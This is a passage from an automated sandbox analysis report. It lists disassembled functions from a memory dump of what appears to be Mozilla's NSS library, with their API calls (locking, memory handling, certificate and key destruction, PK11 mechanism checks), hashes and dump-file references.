                                                                                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                                                                                          • API String ID: 3441714441-3315324353
                                                                                                                                                                                                                                                                                          • Opcode ID: 04eee63f4322e23c85db31b98dfc3118350278146c8805790c3ac4ca2aff1254
                                                                                                                                                                                                                                                                                          • Instruction ID: 93ecc7ba07e362d56a643599b8dd72c918f250d36e87895d127da4ebbbf5f99e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04eee63f4322e23c85db31b98dfc3118350278146c8805790c3ac4ca2aff1254
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 674129B590422067EB215A269F4EBBA32ACAF5272CF500535EC1592F41FB359A18C6D3
                                                                                                                                                                                                                                                                                          Function 6C80AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9890: TlsGetValue.KERNEL32(?,?,?,6C7B97EB), ref: 6C7B989E
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C80AF88
                                                                                                                                                                                                                                                                                          • _PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C80AFCE
                                                                                                                                                                                                                                                                                          • PR_SetPollableEvent.NSS3(?), ref: 6C80AFD9
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C80AFEF
                                                                                                                                                                                                                                                                                          • _PR_MD_NOTIFY_CV.NSS3(?), ref: 6C80B00F
                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C80B02F
                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C80B070
                                                                                                                                                                                                                                                                                          • PR_JoinThread.NSS3(?), ref: 6C80B07B
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C80B084
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C80B09B
                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C80B0C4
                                                                                                                                                                                                                                                                                          • PR_JoinThread.NSS3(?), ref: 6C80B0F3
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C80B0FC
                                                                                                                                                                                                                                                                                          • PR_JoinThread.NSS3(?), ref: 6C80B137
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C80B140
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 235599594-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 74235cc7a915a4cf6549ad1a3cb372103dc8d1e28bd74eee7f5fa263dd55afed
                                                                                                                                                                                                                                                                                          • Instruction ID: da474cc818feb8ecb4a4d568594cc62b133aa15c12a15a9555955a839ea07d4e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74235cc7a915a4cf6549ad1a3cb372103dc8d1e28bd74eee7f5fa263dd55afed
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB915EB5A00601DFCB10DF15C984856BBF1FF5931CB2989A9D8195BB22E732FC4ACB91
                                                                                                                                                                                                                                                                                          Function 6C785CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C782BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C782A28,00000060,00000001), ref: 6C782BF0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C782BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C782A28,00000060,00000001), ref: 6C782C07
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C782BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C782A28,00000060,00000001), ref: 6C782C1E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C782BE0: free.MOZGLUE(?,00000000,00000000,?,6C782A28,00000060,00000001), ref: 6C782C4A
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,6C78AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7880C1), ref: 6C785D0F
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,6C78AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7880C1), ref: 6C785D4E
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,6C78AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7880C1), ref: 6C785D62
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,6C78AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7880C1), ref: 6C785D85
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,6C78AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7880C1), ref: 6C785D99
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,6C78AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7880C1), ref: 6C785DFA
                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6C78AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7880C1), ref: 6C785E33
                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6C78AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C785E3E
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,6C78AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C785E47
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,6C78AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7880C1), ref: 6C785E60
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6C78AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C785E78
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,6C78AAD4), ref: 6C785EB9
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,6C78AAD4), ref: 6C785EF0
                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C78AAD4), ref: 6C785F3D
                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C78AAD4), ref: 6C785F4B
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4273776295-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 71bfe8feab3807f2a70a2e2961c73e4d7383545434999805085d98c4e9de5cc5
                                                                                                                                                                                                                                                                                          • Instruction ID: 454d85cc04a0dc4b35f6b989d1e97b158f2b840a8617fff3acc83b6bef4381dc
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71bfe8feab3807f2a70a2e2961c73e4d7383545434999805085d98c4e9de5cc5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB719EB5A01B009FE750DF20E989A9277A9BF4930CF148938D91E87711E731F919CBA1
                                                                                                                                                                                                                                                                                          Function 6C708DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?), ref: 6C708E22
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C708E36
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C708E4F
                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,?,?,?), ref: 6C708E78
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C708E9B
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C708EAC
                                                                                                                                                                                                                                                                                          • PL_ArenaAllocate.NSS3(?,?), ref: 6C708EDE
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C708EF0
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C708F00
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C708F0E
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C708F39
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C708F4A
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C708F5B
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C708F72
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C708F82
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1569127702-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 717c704238a24fa8ad049476cfd427852d47f38350c30ceca5563283bac4210b
                                                                                                                                                                                                                                                                                          • Instruction ID: bea1b961177d0381340aabaca00b403ce1b5aae534b4f20ea8fa6e7e522ac509
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 717c704238a24fa8ad049476cfd427852d47f38350c30ceca5563283bac4210b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A51D2F2F002159FEB109E68CE8496AB7B9EF55358F19853AE8089B701E731ED44C7D1
                                                                                                                                                                                                                                                                                          Function 6C72CE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,00000132), ref: 6C72CE9E
                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,00000321), ref: 6C72CEBB
                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,00001081), ref: 6C72CED8
                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,00000551), ref: 6C72CEF5
                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,00000651), ref: 6C72CF12
                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,00000321), ref: 6C72CF2F
                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,00000121), ref: 6C72CF4C
                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,00000400), ref: 6C72CF69
                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,00000341), ref: 6C72CF86
                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,00000311), ref: 6C72CFA3
                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,00000301), ref: 6C72CFBC
                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,00000331), ref: 6C72CFD5
                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,00000101), ref: 6C72CFEE
                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,00000141), ref: 6C72D007
                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,00001008), ref: 6C72D021
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: DoesK11_Mechanism
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 622698949-0
                                                                                                                                                                                                                                                                                          • Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
                                                                                                                                                                                                                                                                                          • Instruction ID: 4308f7247356bed57e81d71014ff9349ff5efd8a9349bd920870b6ec670d15f8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9314171B5293027EF5D105A6F2DFDE144A4F6630EF440038F90AE67C0F6D99A2742A9
                                                                                                                                                                                                                                                                                          Function 6C800FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_Lock.NSS3(?), ref: 6C801000
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C6E1A48), ref: 6C7B9BB3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C6E1A48), ref: 6C7B9BC8
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C801016
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C801021
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79DD70: TlsGetValue.KERNEL32 ref: 6C79DD8C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C79DDB4
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C801046
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C80106B
                                                                                                                                                                                                                                                                                          • PR_Lock.NSS3 ref: 6C801079
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C801096
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C8010A7
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C8010B4
                                                                                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(?), ref: 6C8010BF
                                                                                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(?), ref: 6C8010CA
                                                                                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(?), ref: 6C8010D5
                                                                                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(?), ref: 6C8010E0
                                                                                                                                                                                                                                                                                          • PR_DestroyLock.NSS3(?), ref: 6C8010EB
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C801105
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 8544004-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f34bc56fca93f08b4ce3c3e37cd3eb1c51b9a36e1997f020d399beb5a6e84663
                                                                                                                                                                                                                                                                                          • Instruction ID: ea2e4a8b5029ed26c7a8ffc837b23f7ec2560d93af9724305063233c0a9bac40
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f34bc56fca93f08b4ce3c3e37cd3eb1c51b9a36e1997f020d399beb5a6e84663
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D731AFF5A00401ABDB229F10EE8AA45B7B1BF1132CF484531E40912FA1E772F878DBC6
                                                                                                                                                                                                                                                                                          Function 6C67DC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C67DD56
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C67DD7C
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C67DE67
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C67DEC4
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C67DECD
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: memcpy$_byteswap_ulong
                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                          • API String ID: 2339628231-598938438
                                                                                                                                                                                                                                                                                          • Opcode ID: 5e2025080fad21e0da50ca5a1639d78db0ec0d14696856d2f6af5e5df9dc3c5a
                                                                                                                                                                                                                                                                                          • Instruction ID: 8c83d700c3c71c2d97f0145db5fefa178d1d8de390d46cf7a453c0bdb1815308
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e2025080fad21e0da50ca5a1639d78db0ec0d14696856d2f6af5e5df9dc3c5a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3A1E4716042019FC721CF29C980AABB7F5EF85308F198D2DF8899BB51E734E845CBA5
                                                                                                                                                                                                                                                                                          Function 6C73EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C73EE0B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750BE0: malloc.MOZGLUE(6C748D2D,?,00000000,?), ref: 6C750BF8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750BE0: TlsGetValue.KERNEL32(6C748D2D,?,00000000,?), ref: 6C750C15
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C73EEE1
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C731D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C731D7E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C731D50: EnterCriticalSection.KERNEL32(?), ref: 6C731D8E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C731D50: PR_Unlock.NSS3(?), ref: 6C731DD3
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C73EE51
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C73EE65
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C73EEA2
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C73EEBB
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C73EED0
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C73EF48
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C73EF68
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C73EF7D
                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,?), ref: 6C73EFA4
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C73EFDA
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C73F055
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C73F060
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2524771861-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 390ff6d692f0510f93b6f7558977bb11226578ce37691a86370bb075f83c55f3
                                                                                                                                                                                                                                                                                          • Instruction ID: 1b3128891c3f5819d6a166cc774ae7ddf619f2f2470477d02869fedcbb9e7789
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 390ff6d692f0510f93b6f7558977bb11226578ce37691a86370bb075f83c55f3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 018180B1A00219ABEF00DF65DD49ADE77B9BF08318F545034E908A3752E731E924CBE1
                                                                                                                                                                                                                                                                                          Function 6C704CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PK11_SignatureLen.NSS3(?), ref: 6C704D80
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000000), ref: 6C704D95
